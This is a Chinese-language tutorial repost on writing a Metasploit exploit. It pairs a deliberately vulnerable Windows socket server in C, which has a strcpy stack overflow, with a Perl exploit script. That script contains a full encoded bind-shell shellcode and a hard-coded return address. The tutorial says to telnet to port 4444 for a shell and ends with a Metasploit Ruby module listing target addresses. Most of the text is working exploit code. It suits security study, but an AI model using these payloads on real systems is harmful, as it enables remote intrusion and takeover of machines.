编写metasploit exploit 远程socket exploir学习

来源：互联网发布：最好的c语言编程软件编辑：程序博客网时间：2024/05/21 03:26

例子是：

#include <iostream.h> #include <winsock.h> #include <windows.h> #include <stdio.h>//load windows socket #pragma comment(lib, "wsock32.lib") //Define Return Messages #define SS_ERROR 1 #define SS_OK 0 void pr( char *str) { char buf[500]=""; strcpy(buf,str); } void sError(char *str) { MessageBox (NULL, str, "socket Error" ,MB_OK); WSACleanup(); } int main(int argc, char **argv) { WORD sockVersion; WSADATA wsaData; int rVal; char Message[5000]=""; char buf[2000]=""; u_short LocalPort; LocalPort = 200; //wsock32 initialized for usage sockVersion = MAKEWORD(1,1); WSAStartup(sockVersion, &wsaData); //create server socket SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0); if(serverSocket == INVALID_SOCKET) { sError("Failed socket()"); return SS_ERROR; } SOCKADDR_IN sin; sin.sin_family = PF_INET; sin.sin_port = htons(LocalPort); sin.sin_addr.s_addr = INADDR_ANY; //bind the socket rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin)); if(rVal == SOCKET_ERROR) { sError("Failed bind()"); WSACleanup(); return SS_ERROR; } //get socket to listen rVal = listen(serverSocket, 10); if(rVal == SOCKET_ERROR) { sError("Failed listen()"); WSACleanup(); return SS_ERROR; } //wait for a client to connect SOCKET clientSocket; clientSocket = accept(serverSocket, NULL, NULL); if(clientSocket == INVALID_SOCKET) { sError("Failed accept()"); WSACleanup(); return SS_ERROR; } int bytesRecv = SOCKET_ERROR; while( bytesRecv == SOCKET_ERROR ) { //receive the data that is being sent by the client max limit to 5000 bytes. bytesRecv = recv( clientSocket, Message, 5000, 0 ); if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET ) { printf( "\nConnection Closed.\n"); break; } } //Pass the data received to the function pr pr(Message); //close client socket closesocket(clientSocket); //close server socket closesocket(serverSocket); WSACleanup(); return SS_OK; }

典型的EIP 覆盖问题················

perl SOCKET 代码：

在CMD 中 perl 1.pl 服务器IP 服务器端口

use strict;use Socket;my $junk = "\x41"x504;my $eip = pack('V',0x769A1594);#0x769A1594      push esp - retmy $prejumk = "\x90"x46;# windows/shell_bind_tcp - 368 bytes# http://www.metasploit.com# Encoder: x86/shikata_ga_nai# LPORT=4444, RHOST=x.x.x.x, EXITFUNC=seh, my $shellcode = "\x31\xc9\xdb\xc3\xd9\x74\x24\xf4\xb8\xf3\x9a\xbc\x81\x5b" ."\xb1\x56\x31\x43\x16\x03\x43\x16\x83\xc3\xf7\x78\x49\x7d" ."\x1f\xf5\xb2\x7e\xdf\x66\x3a\x9b\xee\xb4\x58\xef\x42\x09" ."\x2a\xbd\x6e\xe2\x7e\x56\xe5\x86\x56\x59\x4e\x2c\x81\x54" ."\x4f\x80\x0d\x3a\x93\x82\xf1\x41\xc7\x64\xcb\x89\x1a\x64" ."\x0c\xf7\xd4\x34\xc5\x73\x46\xa9\x62\xc1\x5a\xc8\xa4\x4d" ."\xe2\xb2\xc1\x92\x96\x08\xcb\xc2\x06\x06\x83\xfa\x2d\x40" ."\x34\xfa\xe2\x92\x08\xb5\x8f\x61\xfa\x44\x59\xb8\x03\x77" ."\xa5\x17\x3a\xb7\x28\x69\x7a\x70\xd2\x1c\x70\x82\x6f\x27" ."\x43\xf8\xab\xa2\x56\x5a\x38\x14\xb3\x5a\xed\xc3\x30\x50" ."\x5a\x87\x1f\x75\x5d\x44\x14\x81\xd6\x6b\xfb\x03\xac\x4f" ."\xdf\x48\x77\xf1\x46\x35\xd6\x0e\x98\x91\x87\xaa\xd2\x30" ."\xdc\xcd\xb8\x5c\x11\xe0\x42\x9d\x3d\x73\x30\xaf\xe2\x2f" ."\xde\x83\x6b\xf6\x19\xe3\x46\x4e\xb5\x1a\x68\xaf\x9f\xd8" ."\x3c\xff\xb7\xc9\x3c\x94\x47\xf5\xe9\x3b\x18\x59\x41\xfc" ."\xc8\x19\x31\x94\x02\x96\x6e\x84\x2c\x7c\x19\x82\xe2\xa4" ."\x4a\x65\x07\x5b\x7d\x29\x8e\xbd\x17\xc1\xc6\x16\x8f\x23" ."\x3d\xaf\x28\x5b\x17\x83\xe1\xcb\x2f\xcd\x35\xf3\xaf\xdb" ."\x16\x58\x07\x8c\xec\xb2\x9c\xad\xf3\x9e\xb4\xa4\xcc\x49" ."\x4e\xd9\x9f\xe8\x4f\xf0\x77\x88\xc2\x9f\x87\xc7\xfe\x37" ."\xd0\x80\x31\x4e\xb4\x3c\x6b\xf8\xaa\xbc\xed\xc3\x6e\x1b" ."\xce\xca\x6f\xee\x6a\xe9\x7f\x36\x72\xb5\x2b\xe6\x25\x63" ."\x85\x40\x9c\xc5\x7f\x1b\x73\x8c\x17\xda\xbf\x0f\x61\xe3" ."\x95\xf9\x8d\x52\x40\xbc\xb2\x5b\x04\x48\xcb\x81\xb4\xb7" ."\x06\x02\xca\x46\x9a\x9f\x5b\xf1\x4f\xe2\x01\x02\xba\x21" ."\x3c\x81\x4e\xda\xbb\x99\x3b\xdf\x80\x1d\xd0\xad\x99\xcb" ."\xd6\x02\x99\xd9";my $host = shift || 'localhost';my $port = shift || 200;my $proto = getprotobyname('tcp');my $iaddr = inet_aton($host);my $paddr = sockaddr_in($port,$iaddr);socket(SOCKET,AF_INET,SOCK_STREAM,$proto) or die "socket: $!";print "[+] Connecting to $host on port $port\n";connect(SOCKET,$paddr) or die "connect: $!";print "[+] Sending payload";print SOCKET $junk.$eip.$prejumk.$shellcode."\n";print "[+] Payload sent\n";close SOCKET or die "cose: $!";

执行完后

telnet 服务器IP 4444 即可得到shell

主要能看懂metasploit 就好了·········

C:\Program Files\Metasploit\Framework3\msf3\modules\exploits\windows\misc 创建文件 xxx.rb

require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Custom vulnerable server stack overflow', 'Description' => %q{ This module exploits a stack overflow in a custom vulnerable server. }, 'Author' => [ 'Peter Van Eeckhoutte' ], 'Version' => '$Revision: 9999 $', 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1400, 'BadChars' => "\x00\xff", }, 'Platform' => 'win', 'Targets' => [ ['Windows XP SP3 En', { 'Ret' => 0x7c874413, 'Offset' => 504 } ], ['Windows 2003 Server R2 SP2', { 'Ret' => 0x71c02b67, 'Offset' => 504 } ], ], 'DefaultTarget' => 0, 'Privileged' => false )) register_options( [ Opt::RPORT(200) ], self.class) end def exploit connect junk = make_nops(target['Offset']) sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded sock.put(sploit) handler disconnect end end

0 0